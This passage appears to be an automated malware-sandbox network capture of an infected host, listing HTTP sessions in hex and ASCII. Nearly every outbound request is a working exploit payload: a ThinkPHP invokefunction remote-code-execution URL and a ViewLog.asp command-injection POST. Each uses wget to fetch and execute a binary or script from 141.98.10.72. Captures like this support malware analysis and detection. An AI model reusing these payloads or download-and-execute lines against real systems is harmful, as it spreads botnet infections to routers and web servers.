                                                      Feb 14, 2024 09:29:19.398586988 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      192192.168.2.155836895.100.5.12380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.170434952 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.537597895 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:19 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:19 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 39 26 23 34 36 3b 32 30 30 38 33 65 64 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;55722c31&#46;1707899359&#46;20083ed6</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      193192.168.2.155668895.59.137.380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.374732018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:20.826395035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:22.522315979 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:26.042218924 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:32.954032898 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:46.521625042 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.680826902 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      194192.168.2.155098631.200.76.238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.422696114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      195192.168.2.155830294.121.186.2248080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.422807932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      196192.168.2.153670031.200.86.1008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.422863007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      197192.168.2.153697295.216.204.25480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.480417967 CET48INHTTP/1.1 101 Switching Protocols


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      198192.168.2.156033288.220.84.18680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.501375914 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:19.732599020 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:32:20 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      199192.168.2.156097231.136.253.1358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.876840115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.506437063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:21.754403114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:24.250291109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.370171070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.354000092 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:00.345343113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304266930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      200192.168.2.155516294.123.176.568080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:19.922508001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      201192.168.2.154376294.122.21.498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.428968906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      202192.168.2.154680094.121.186.1878080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.450865984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      203192.168.2.155827095.239.32.2188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.461287022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:21.724486113 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      204192.168.2.154693431.136.20.2038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:21.631867886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:22.266638994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.514333963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:26.046221972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:31.166269064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.145791054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
